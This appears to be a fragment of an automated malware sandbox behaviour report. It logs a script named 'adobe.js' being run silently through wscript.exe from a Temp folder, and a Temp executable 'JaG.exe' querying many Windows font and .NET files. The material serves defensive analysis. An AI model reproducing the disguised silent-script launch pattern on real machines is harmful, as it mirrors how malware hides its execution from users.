Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: otc:\users\user\appdata\local\temp\adobe.jsal\temp\adobe | memstr_7b4d00ba-f |
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: soxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"ngsng[ | memstr_bd7c84e6-b |
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobe | memstr_eb8ab546-e |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\JaG.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation | Jump to behavior |
